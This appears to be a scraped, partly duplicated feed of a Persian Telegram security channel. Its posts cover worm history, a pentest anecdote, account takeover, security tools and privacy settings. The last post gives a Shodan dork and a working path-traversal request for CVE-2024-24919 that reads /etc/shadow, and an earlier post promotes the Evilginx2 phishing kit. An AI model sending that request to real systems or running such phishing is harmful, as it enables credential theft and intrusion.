👾 بدافزاری که تاریخ ساز شد.
Loveletter - 2000.
• سه کلمه مخفی که میلیون ها کامپیوتر ویندوزی را در سراسر جهان هک کرده است. این کرم به عنوان پیوست "LOVE-LETTER-FOR-YOU.TXT.vbs" در ایمیلی با موضوع "IloveYou" توزیع شد. به محض باز شدن این فایل، دستگاه کاربر آلوده شد. این کرم کپی هایی از خود را برای همه مخاطبین در دفترچه آدرس Microsoft Outlook ارسال کرد و انواع خاصی از فایل ها را بازنویسی کرد. فایل های LOVE-LETTER-FOR-YOU.HTM را در دایرکتوری سیستم ویندوز ایجاد کرد و آنها را از طریق کانال های IRC توزیع کرد.
• کل ترفند این بود که مردم را دستکاری کنید. واقعیت این است که پسوند فایل در ویندوز به طور پیش فرض مخفی شده بود، یعنی قربانی موارد زیر را مشاهده کرد: LOVE-LETTER-FOR-YOU.TXT (بدون vbs.)، با تصور اینکه یک فایل متنی بی ضرر است و آن را باز کرد. این باعث شروع بدافزار شد.
• در مورد خالقان این خلقت، آنها دو جوان اهل فیلیپین بودند - Reonel Ramones و Onel de Guzman. به دلیل ایجاد و انتشار ویروس، این افراد توسط NBI (دفتر تحقیقات ملی فیلیپین) دستگیر شدند. محاکمه آسان و حتی خنده دار نبود، زیرا قوانین فیلیپین شامل مجازات برای ایجاد OP مخرب نمی شد. در ابتدا آنها می خواستند به مظنونان کلاهبرداری از کارت اعتباری و سپس خسارت مالی را نسبت دهند. با این حال، شواهد کافی وجود نداشت و Reonel Ramones و Onel de Guzman آزاد شدند.
• در سال 2002، ایجاد آنها در کتاب رکوردهای گینس به عنوان خطرناک ترین ویروس رایانه ای در تمام دوران گنجانده شد (زیان به اقتصاد جهانی از ILoveYou تقریباً 5.5 میلیارد دلار بود).
@TryHackBox
Loveletter - 2000.
• سه کلمه مخفی که میلیون ها کامپیوتر ویندوزی را در سراسر جهان هک کرده است. این کرم به عنوان پیوست "LOVE-LETTER-FOR-YOU.TXT.vbs" در ایمیلی با موضوع "IloveYou" توزیع شد. به محض باز شدن این فایل، دستگاه کاربر آلوده شد. این کرم کپی هایی از خود را برای همه مخاطبین در دفترچه آدرس Microsoft Outlook ارسال کرد و انواع خاصی از فایل ها را بازنویسی کرد. فایل های LOVE-LETTER-FOR-YOU.HTM را در دایرکتوری سیستم ویندوز ایجاد کرد و آنها را از طریق کانال های IRC توزیع کرد.
• کل ترفند این بود که مردم را دستکاری کنید. واقعیت این است که پسوند فایل در ویندوز به طور پیش فرض مخفی شده بود، یعنی قربانی موارد زیر را مشاهده کرد: LOVE-LETTER-FOR-YOU.TXT (بدون vbs.)، با تصور اینکه یک فایل متنی بی ضرر است و آن را باز کرد. این باعث شروع بدافزار شد.
• در مورد خالقان این خلقت، آنها دو جوان اهل فیلیپین بودند - Reonel Ramones و Onel de Guzman. به دلیل ایجاد و انتشار ویروس، این افراد توسط NBI (دفتر تحقیقات ملی فیلیپین) دستگیر شدند. محاکمه آسان و حتی خنده دار نبود، زیرا قوانین فیلیپین شامل مجازات برای ایجاد OP مخرب نمی شد. در ابتدا آنها می خواستند به مظنونان کلاهبرداری از کارت اعتباری و سپس خسارت مالی را نسبت دهند. با این حال، شواهد کافی وجود نداشت و Reonel Ramones و Onel de Guzman آزاد شدند.
• در سال 2002، ایجاد آنها در کتاب رکوردهای گینس به عنوان خطرناک ترین ویروس رایانه ای در تمام دوران گنجانده شد (زیان به اقتصاد جهانی از ILoveYou تقریباً 5.5 میلیارد دلار بود).
@TryHackBox
Wikipedia
IRC
protocol for real-time Internet chat and messaging
🌐 Wi-Fi CheatSheet.
• راهنمای بسیار جامعی که به شما در درک اصول اولیه Wi-Fi کمک می کند:
➡️ https://www.wiisfi.com
#CheatSheet #WiFi
@TryHackBox
• راهنمای بسیار جامعی که به شما در درک اصول اولیه Wi-Fi کمک می کند:
➡️ https://www.wiisfi.com
#CheatSheet #WiFi
@TryHackBox
Forwarded from TryHackBox Story
⚠️ نفوذگران هنگام تلاش برای هک شرکت شما چه خطری را تهدید می کنند؟ قسمت 1.
• داستان دو نفوذگر (گری و جاستین) در مورد اینکه چگونه یک روز یک ممیزی امنیتی برای آنها انجام شد. متخلفان ورودی ساختمان و زیرساخت های فناوری اطلاعات دادگاه را هک کردند و تنها چند ساعت بعد خود را در آنجا یافتند اما به عنوان متهم:
• یک هفته برای یک پروژه جدید اختصاص داده شد، نفوذگران تقریباً کارت سفید کامل داشتند - آنها می توانستند هر کاری انجام دهند: از کلیدهای اصلی استفاده کنند، از در پشتی عبور کنند، ظروف زباله را حفر کنند، درایوهای فلش را وصل کنند. تنها کاری که آنها از انجام آن منع شده بودند، خاموش کردن سیستم هشدار بود.
• تعهدات آزمایش کنندگان در 28 صفحه نوشته شد. بیمه در برابر دستگیری فهرستی از افرادی بود - کارمندان سیستم دادگاه آیووا - که از این روند آگاه بودند و می توانستند ثابت کنند که مجرمان مجرم نیستند.
• اولین روز پروژه یک هفته ای بدون حادثه گذشت. پنتسترها شبانه وارد ساختمان شدند و از نشانه هایی از مشکلات امنیتی که پیدا کردند عکس گرفتند. آنها کارت ویزیت خود را روی میز مشتری گذاشتند تا دلیلی بر این باشد که آنها داخل شدند و او را از تمام یافته های خود مطلع کردند.
• تماس بعدی سه شنبه بود و درهای طبقاتی که جلسات دادگاه برگزار می شد برای همان شب تعیین شده بود. در اول به راحتی تسلیم شد، اما در دومی مشکلاتی به وجود آمد - مکانیزم امنیتی پنهانی داشت که نفوذگران آن را نمی دیدند. در راه، آنها همچنین اتاقی با مانیتورهای تمام دوربین های امنیتی که می توانستند وارد شوند، پیدا کردند. از دوربین ها دیدند که یک افسر امنیتی در راهروها قدم می زند. برای جلوگیری از گرفتار شدن، نفوذگران از پوشش در "نقاط کور" استفاده کردند و سپس به آزمایش ادامه دادند. اما نه برای مدت طولانی - زنگ هشدار به صدا درآمد. معلوم شد که درهای طبقه ای که از آن عبور کرده بودند قفل مانده بود. علیرغم این واقعیت که زنگ هشدار به صدا درآمد، متخلفان وظایف خود را برای آن شب انجام دادند و با یادآوری اینکه چگونه از سرویس امنیتی در انبوهی از چیزها پنهان شده بودند، خندیدند.
• با گذشت زمان، آنها به بازرسی دادگاه دیگری ادامه دادند. وقتی می خواستند وارد شوند، معلوم شد که درب آن باز است. آنها او را هل دادند، اما آلارم به صدا درآمد. پس از چندین بار تلاش برای بیدار کردن زنگ، آنها تصمیم گرفتند در را ببندند تا طبق وظیفه خود نفوذ کنند. و به محض اینکه شروع به باز کردن آن کردند، یک سیگنال هشدار و سپس یک زنگ واقعی شنیدند. این اتفاق به قدری سریع رخ داد که زمانی برای وارد کردن کد امنیتی برای متوقف کردن زنگ هشدار وجود نداشت. آنقدر فریاد زد که تمام شهر می شنیدند. پناهجویان فقط می توانستند منتظر پلیس باشند....
#داستان
@TryHackBoxStory
• داستان دو نفوذگر (گری و جاستین) در مورد اینکه چگونه یک روز یک ممیزی امنیتی برای آنها انجام شد. متخلفان ورودی ساختمان و زیرساخت های فناوری اطلاعات دادگاه را هک کردند و تنها چند ساعت بعد خود را در آنجا یافتند اما به عنوان متهم:
• یک هفته برای یک پروژه جدید اختصاص داده شد، نفوذگران تقریباً کارت سفید کامل داشتند - آنها می توانستند هر کاری انجام دهند: از کلیدهای اصلی استفاده کنند، از در پشتی عبور کنند، ظروف زباله را حفر کنند، درایوهای فلش را وصل کنند. تنها کاری که آنها از انجام آن منع شده بودند، خاموش کردن سیستم هشدار بود.
• تعهدات آزمایش کنندگان در 28 صفحه نوشته شد. بیمه در برابر دستگیری فهرستی از افرادی بود - کارمندان سیستم دادگاه آیووا - که از این روند آگاه بودند و می توانستند ثابت کنند که مجرمان مجرم نیستند.
• اولین روز پروژه یک هفته ای بدون حادثه گذشت. پنتسترها شبانه وارد ساختمان شدند و از نشانه هایی از مشکلات امنیتی که پیدا کردند عکس گرفتند. آنها کارت ویزیت خود را روی میز مشتری گذاشتند تا دلیلی بر این باشد که آنها داخل شدند و او را از تمام یافته های خود مطلع کردند.
• تماس بعدی سه شنبه بود و درهای طبقاتی که جلسات دادگاه برگزار می شد برای همان شب تعیین شده بود. در اول به راحتی تسلیم شد، اما در دومی مشکلاتی به وجود آمد - مکانیزم امنیتی پنهانی داشت که نفوذگران آن را نمی دیدند. در راه، آنها همچنین اتاقی با مانیتورهای تمام دوربین های امنیتی که می توانستند وارد شوند، پیدا کردند. از دوربین ها دیدند که یک افسر امنیتی در راهروها قدم می زند. برای جلوگیری از گرفتار شدن، نفوذگران از پوشش در "نقاط کور" استفاده کردند و سپس به آزمایش ادامه دادند. اما نه برای مدت طولانی - زنگ هشدار به صدا درآمد. معلوم شد که درهای طبقه ای که از آن عبور کرده بودند قفل مانده بود. علیرغم این واقعیت که زنگ هشدار به صدا درآمد، متخلفان وظایف خود را برای آن شب انجام دادند و با یادآوری اینکه چگونه از سرویس امنیتی در انبوهی از چیزها پنهان شده بودند، خندیدند.
• با گذشت زمان، آنها به بازرسی دادگاه دیگری ادامه دادند. وقتی می خواستند وارد شوند، معلوم شد که درب آن باز است. آنها او را هل دادند، اما آلارم به صدا درآمد. پس از چندین بار تلاش برای بیدار کردن زنگ، آنها تصمیم گرفتند در را ببندند تا طبق وظیفه خود نفوذ کنند. و به محض اینکه شروع به باز کردن آن کردند، یک سیگنال هشدار و سپس یک زنگ واقعی شنیدند. این اتفاق به قدری سریع رخ داد که زمانی برای وارد کردن کد امنیتی برای متوقف کردن زنگ هشدار وجود نداشت. آنقدر فریاد زد که تمام شهر می شنیدند. پناهجویان فقط می توانستند منتظر پلیس باشند....
#داستان
@TryHackBoxStory
🔥3
🔑 اعتبارات پیش فرض.
• رمزهای عبور پیش فرض در دستگاه های شبکه رایج تر از آن چیزی است که در نگاه اول به نظر می رسد. در اینترنت، صدها روتر نه تنها برای کاربران خصوصی، بلکه برای شبکه های شرکتی با پورت های باز وجود دارد.
• در اینجا پیوندی به مخزن وجود دارد که حاوی تعداد زیادی ترکیب استاندارد ورود/گذرواژه است که در بسیاری از دستگاه ها و سرویس ها استفاده می شود:
➡️ https://github.com/ihebski/DefaultCreds-cheat-sheet
• اطلاعات هم برای تیم قرمز و هم برای تیم آبی مفید خواهد بود.
@TryHackBox
• رمزهای عبور پیش فرض در دستگاه های شبکه رایج تر از آن چیزی است که در نگاه اول به نظر می رسد. در اینترنت، صدها روتر نه تنها برای کاربران خصوصی، بلکه برای شبکه های شرکتی با پورت های باز وجود دارد.
• در اینجا پیوندی به مخزن وجود دارد که حاوی تعداد زیادی ترکیب استاندارد ورود/گذرواژه است که در بسیاری از دستگاه ها و سرویس ها استفاده می شود:
➡️ https://github.com/ihebski/DefaultCreds-cheat-sheet
• اطلاعات هم برای تیم قرمز و هم برای تیم آبی مفید خواهد بود.
@TryHackBox
GitHub
GitHub - ihebski/DefaultCreds-cheat-sheet: One place for all the default credentials to assist the Blue/Red teamers identifying…
One place for all the default credentials to assist the Blue/Red teamers identifying devices with default password 🛡️ - ihebski/DefaultCreds-cheat-sheet
👍1
🏰 DevSecOps Security Architecture.
• Honeypot Network and Services in DevSecOps Security Architecture;
• Flume log collection;
• Kafka Knowledge System;
• Zookeeper Knowledge System;
• ElastAlert ES Alarm Tool;
• Elastic Knowledge System;
• Real IP address Detection;
• Nginx configuration log format;
• Container security tools;
• osquery operating system detection and analysis;
• jumpserver open source bastion server;
• wazuh Host Intrusion Detection System;
• Bro Network Security Monitoring;
• GitHub Information Leak Monitoring;
• Application layer denial of service attacks;
• Slowloris;
• Resources.
#DevSecOps
@TryHackBox
• Honeypot Network and Services in DevSecOps Security Architecture;
• Flume log collection;
• Kafka Knowledge System;
• Zookeeper Knowledge System;
• ElastAlert ES Alarm Tool;
• Elastic Knowledge System;
• Real IP address Detection;
• Nginx configuration log format;
• Container security tools;
• osquery operating system detection and analysis;
• jumpserver open source bastion server;
• wazuh Host Intrusion Detection System;
• Bro Network Security Monitoring;
• GitHub Information Leak Monitoring;
• Application layer denial of service attacks;
• Slowloris;
• Resources.
#DevSecOps
@TryHackBox
آسیب پذیری ATO چیست؟
به طور خلاصه به جعل کردن یوزرنیم و پسورد یه کاربر و وارد شدن به حساب کاربری اون، ATO یا همون (Account Takeover) میگن. اگه به بیشتر خوندن علاقه دارید، این مقاله خیلی مفیده.
خلاصه مقاله معرفی شده که AI نوشته است:
به طور خلاصه به جعل کردن یوزرنیم و پسورد یه کاربر و وارد شدن به حساب کاربری اون، ATO یا همون (Account Takeover) میگن. اگه به بیشتر خوندن علاقه دارید، این مقاله خیلی مفیده.
خلاصه مقاله معرفی شده که AI نوشته است:
تصاحب حساب کاربری (Account Takeover یا ATO) نوعی حمله سایبری است که در آن مهاجمان با استفاده از اطلاعات ورودی دزدیدهشده مانند نام کاربری و رمز عبور، به حسابهای آنلاین کاربران دسترسی پیدا میکنند. این اطلاعات معمولاً از طریق حملات مهندسی اجتماعی، نشت دادهها و حملات فیشینگ به دست میآید و سپس درt وب تاریک خریداری میشود. مهاجمان با استفاده از این اطلاعات، رباتهایی را برای تست ترکیبات مختلف رمز عبور و نام کاربری به کار میگیرند تا بتوانند به حسابهای کاربری در سایتهای مختلف مانند مالی، تجارت الکترونیک و شبکههای اجتماعی دسترسی پیدا کنند.By -> imem!
مجرمان سایبری پس از تأیید اطلاعات حسابها، این اطلاعات را میفروشند یا از آنها برای سوءاستفاده از حسابها استفاده میکنند. این حملات نوعی سرقت هویت به شمار میآیند.
یکی از دلایل موفقیت این حملات، عدم تغییر منظم رمزهای عبور توسط کاربران و استفاده مجدد از جزئیات ورود به سیستم در سایتهای مختلف است. مهاجمان میتوانند با استفاده از ابزارهای اتوماتیک حملات جستجوی فراگیر و پر کردن اطلاعات کاربری (Credential Stuffing) را انجام دهند.
این نوع حملات به ویژه در مؤسسات مالی خطرناک است زیرا میتواند به سرقت مستقیم پول از حسابهای کاربری منجر شود. برای مقابله با این حملات، مؤسسات میتوانند از روشهای مختلفی مانند تأیید هویت چندعاملی (MFA)، سیستمهای ردیابی حساب و فناوریهای مبتنی بر هوش مصنوعی استفاده کنند. همچنین، استفاده از فایروالهای برنامههای وب (WAF) برای شناسایی و مسدود کردن ترافیک مخرب میتواند به جلوگیری از حملات ATO کمک کند.
Learning Center
Account Takeover Attack (ATO) | Types, Detection & Protection | Imperva
ATO stands for Account Takeover. It’s an attack whereby cybercriminals take ownership of online accounts using stolen passwords and usernames.
آیا میدانید URN چیست؟
درواقع URN یا (نام یکنواخت منابع) یکی از انواع URI است که به عنوان یک نام یکتا و پایدار برای یک منبع خاص عمل میکند، بدون توجه به مکانی که این منبع در آن قرار دارد. این به این معناست که یک URN میتواند برای شناسایی یک منبع خاص استفاده شود حتی اگر مکان فیزیکی یا الکترونیکی آن منبع تغییر کند.
تفاوت URN با URL چیست؟
برخلاف URL (یک نوع دیگر از URI)، که مکان دقیق یک منبع را شامل میشود (مانند آدرس وب سایت)، URN بیشتر به عنوان یک شناسه ثابت و یکتا عمل میکند که با تغییر مکان منبع، ثابت باقی میماند. برای مثال، یک URN میتواند یک سند یا کتاب را شناسایی کند بدون اینکه نیاز باشد مکان دقیق آن سند یا کتاب مشخص شود.
چالشهای استفاده از URN
استفاده از URNها همچنان در مرحلهی آزمایشی قرار دارد و به طور گستردهای پذیرفته نشده است. برای کارکرد موثر URNها، نیاز به یک زیرساخت پشتیبان وجود دارد که بتواند مکان منابع را مشخص کند. عدم وجود چنین زیرساختی، مانعی برای پذیرش گسترده URNها بوده است. اما URNها پتانسیل جالبی برای آینده دارند.
درواقع URN یا (نام یکنواخت منابع) یکی از انواع URI است که به عنوان یک نام یکتا و پایدار برای یک منبع خاص عمل میکند، بدون توجه به مکانی که این منبع در آن قرار دارد. این به این معناست که یک URN میتواند برای شناسایی یک منبع خاص استفاده شود حتی اگر مکان فیزیکی یا الکترونیکی آن منبع تغییر کند.
تفاوت URN با URL چیست؟
برخلاف URL (یک نوع دیگر از URI)، که مکان دقیق یک منبع را شامل میشود (مانند آدرس وب سایت)، URN بیشتر به عنوان یک شناسه ثابت و یکتا عمل میکند که با تغییر مکان منبع، ثابت باقی میماند. برای مثال، یک URN میتواند یک سند یا کتاب را شناسایی کند بدون اینکه نیاز باشد مکان دقیق آن سند یا کتاب مشخص شود.
چالشهای استفاده از URN
استفاده از URNها همچنان در مرحلهی آزمایشی قرار دارد و به طور گستردهای پذیرفته نشده است. برای کارکرد موثر URNها، نیاز به یک زیرساخت پشتیبان وجود دارد که بتواند مکان منابع را مشخص کند. عدم وجود چنین زیرساختی، مانعی برای پذیرش گسترده URNها بوده است. اما URNها پتانسیل جالبی برای آینده دارند.
🖥 Evilginx2
- ابزار فیشینگ
ابزاری است که برای انجام حملات فیشینگ و گرفتن اطلاعات کاربری طراحی شده است. این به شما امکان می دهد وب سایت های جعلی ایجاد کنید که برای رهگیری ورود کاربران، رمز عبور و سایر داده های حساس استفاده می شود.
- این ابزار فرصت های زیادی را برای انجام حملات فیشینگ فراهم می کند، از جمله:
1. ایجاد صفحات وب جعلی برای سرویس های آنلاین محبوب.
2. تجزیه و تحلیل جلسات کاربر.
3. اتوماسیون پروسس گرفتن اعتبار.
https://github.com/kgretzky/evilginx2
#Phishing
@TryHackBox
- ابزار فیشینگ
ابزاری است که برای انجام حملات فیشینگ و گرفتن اطلاعات کاربری طراحی شده است. این به شما امکان می دهد وب سایت های جعلی ایجاد کنید که برای رهگیری ورود کاربران، رمز عبور و سایر داده های حساس استفاده می شود.
- این ابزار فرصت های زیادی را برای انجام حملات فیشینگ فراهم می کند، از جمله:
1. ایجاد صفحات وب جعلی برای سرویس های آنلاین محبوب.
2. تجزیه و تحلیل جلسات کاربر.
3. اتوماسیون پروسس گرفتن اعتبار.
https://github.com/kgretzky/evilginx2
#Phishing
@TryHackBox
در حال حاضر ما هیچ دوره ای نداریم ولی در نظر داریم یک بخش خرید اشتراکی ایجاد کنیم تا شما عزیزان بتوانید در دوره های معتبر فارسی شرکت کنید و از آموزش بهره ببرید .
آیا موافق برگزاری خرید اشتراکی هستید ؟
آیا موافق برگزاری خرید اشتراکی هستید ؟
Final Results
61%
بله
39%
خیر
👎5👍2
این بحث خرید اشتراکی بخاطر درخواست چند نفر از شما عزیزان بوده وگر نه ما همچین چیزی تا بحال نداشتیم .
🔥1
Media is too big
VIEW IN TELEGRAM
هک اخلاقی در 15 ساعت - نسخه 2023 - آموزش هک کردن! (قسمت 2)؛
@TryHackBox
@TryHackBox
❤1
This media is not supported in your browser
VIEW IN TELEGRAM
🖥 IntelOwl
- تجزیه و تحلیل تهدید شبکه
یک ابزار تحقیقاتی باز است که به تجزیه و تحلیل تهدیدهای مختلف امنیت اطلاعات کمک می کند. قابلیت جمع آوری، تجزیه و تحلیل و تجسم اطلاعات در مورد تهدیدات احتمالی مانند فایل های مخرب، URL ها، آدرس های IP و دامنه ها را فراهم می کند.
- این ابزار به شما امکان می دهد انواع مختلفی از تجزیه و تحلیل را انجام دهید، مانند:
1. تجزیه و تحلیل استاتیک فایل ها.
2. جستجوی اطلاعات در مورد تهدیدات در منابع باز.
3. آدرس های IP و دامنه ها را برای اتصالات با تهدیدات شناخته شده بررسی کنید.
https://github.com/intelowlproject/IntelOwl
#Recon
@TryHackBox
- تجزیه و تحلیل تهدید شبکه
یک ابزار تحقیقاتی باز است که به تجزیه و تحلیل تهدیدهای مختلف امنیت اطلاعات کمک می کند. قابلیت جمع آوری، تجزیه و تحلیل و تجسم اطلاعات در مورد تهدیدات احتمالی مانند فایل های مخرب، URL ها، آدرس های IP و دامنه ها را فراهم می کند.
- این ابزار به شما امکان می دهد انواع مختلفی از تجزیه و تحلیل را انجام دهید، مانند:
1. تجزیه و تحلیل استاتیک فایل ها.
2. جستجوی اطلاعات در مورد تهدیدات در منابع باز.
3. آدرس های IP و دامنه ها را برای اتصالات با تهدیدات شناخته شده بررسی کنید.
https://github.com/intelowlproject/IntelOwl
#Recon
@TryHackBox
❤1👍1
Try Hack Box pinned «در حال حاضر ما هیچ دوره ای نداریم ولی در نظر داریم یک بخش خرید اشتراکی ایجاد کنیم تا شما عزیزان بتوانید در دوره های معتبر فارسی شرکت کنید و از آموزش بهره ببرید .
آیا موافق برگزاری خرید اشتراکی هستید ؟»
آیا موافق برگزاری خرید اشتراکی هستید ؟»
🥷 AskHackers Search
- ابزار جستجوی هوش مصنوعی بر اساس دادههای Hacker News!
هکر نیوز یک منبع قابل اعتماد و محبوب برای آخرین اخبار و گزارش های فنی در مورد امنیت سایبری و هک است.
اکنون پاسخ سوالات شما در جستجوی AskHackers بر اساس نظرات موجود در آنجا خواهد بود و در اصل، می توانید از هکرهای سراسر جهان بپرسید.
https://askhackers.com/
@TryHackBox
- ابزار جستجوی هوش مصنوعی بر اساس دادههای Hacker News!
هکر نیوز یک منبع قابل اعتماد و محبوب برای آخرین اخبار و گزارش های فنی در مورد امنیت سایبری و هک است.
اکنون پاسخ سوالات شما در جستجوی AskHackers بر اساس نظرات موجود در آنجا خواهد بود و در اصل، می توانید از هکرهای سراسر جهان بپرسید.
https://askhackers.com/
@TryHackBox
This media is not supported in your browser
VIEW IN TELEGRAM
افزایش دسترسی لینوکس برای مبتدیان
@TryHackBox
@TryHackBox
🖥 TLS Prober
- تجزیه و تحلیل TLS
ابزاری است که به طور خاص برای تجزیه و تحلیل امنیتی پروتکل TLS طراحی شده است.
- این ابزار قابلیت اسکن امنیت TLS را دارد. این به شناسایی نقاط ضعف در تنظیمات TLS کمک می کند و توانایی بهبود امنیت اطلاعات ارسال شده را فراهم می کند.
https://github.com/WestpointLtd/tls_prober
#Tools #Network
@TryHackBox
- تجزیه و تحلیل TLS
ابزاری است که به طور خاص برای تجزیه و تحلیل امنیتی پروتکل TLS طراحی شده است.
- این ابزار قابلیت اسکن امنیت TLS را دارد. این به شناسایی نقاط ضعف در تنظیمات TLS کمک می کند و توانایی بهبود امنیت اطلاعات ارسال شده را فراهم می کند.
https://github.com/WestpointLtd/tls_prober
#Tools #Network
@TryHackBox
🖥 مخزن: DFTDC
- غیرفعال کردن تله متری
این مجموعه ای از تنظیمات مختلف در صفحه گزینه های فایرفاکس است که به به حداقل رساندن ارسال تله متری و جمع آوری داده ها کمک می کند.
- توضیح مهم: پس از استفاده از مخزن، با تغییر این تنظیمات، فایرفاکس همچنان داده ها را جمع آوری و به سرورهای خود ارسال می کند، اما در مقادیر بسیار کمتر.
https://github.com/K3V1991/Disable-Firefox-Telemetry-and-Data-Collection
#Firefox #Data #Telemetry
@TryHackBox
- غیرفعال کردن تله متری
این مجموعه ای از تنظیمات مختلف در صفحه گزینه های فایرفاکس است که به به حداقل رساندن ارسال تله متری و جمع آوری داده ها کمک می کند.
- توضیح مهم: پس از استفاده از مخزن، با تغییر این تنظیمات، فایرفاکس همچنان داده ها را جمع آوری و به سرورهای خود ارسال می کند، اما در مقادیر بسیار کمتر.
https://github.com/K3V1991/Disable-Firefox-Telemetry-and-Data-Collection
#Firefox #Data #Telemetry
@TryHackBox
GitHub
GitHub - K3V1991/Disable-Firefox-Telemetry-and-Data-Collection: How to disable Firefox Telemetry and Data Collection
How to disable Firefox Telemetry and Data Collection - K3V1991/Disable-Firefox-Telemetry-and-Data-Collection
همه در مورد CVE-2024-24919 می نویسند و ما در مورد آن خواهیم نوشت.
🔍 Dork for Shodan: noscript:"Check Point" ssl:"target"
عملیات👇
#CVE
@TryHackBox
🔍 Dork for Shodan: noscript:"Check Point" ssl:"target"
عملیات👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#CVE
@TryHackBox